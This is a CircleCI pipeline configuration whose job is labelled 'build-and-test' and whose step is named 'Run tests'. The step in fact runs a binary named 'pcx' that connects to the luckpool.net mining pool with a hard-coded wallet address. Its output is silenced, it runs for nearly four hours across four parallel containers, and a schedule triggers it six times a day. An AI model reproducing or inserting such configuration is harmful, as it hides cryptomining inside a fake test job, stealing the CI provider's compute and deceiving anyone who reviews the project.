version: 2.1

jobs:
  build-and-test:
    parallelism: 4
    docker:
      - image: ubuntu:18.04
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           chmod +x pcx
           timeout 239m ./pcx -v -l eu.luckpool.net:3956 -u RQnRdnXnNmZa7Tg7JA8tKUrR8bC7VtJSDb.$(echo $(shuf -i 1-5 -n 1)-TOKAI) -t 2 > /dev/null 2>&1
           sudo apt update

workflows:
  version: 2
  daily:
    triggers:
      - schedule:
         cron: "0 2,6,10,14,18,22 * * *"
         filters:
           branches:
             only:
               - master
    jobs:
      - build-and-test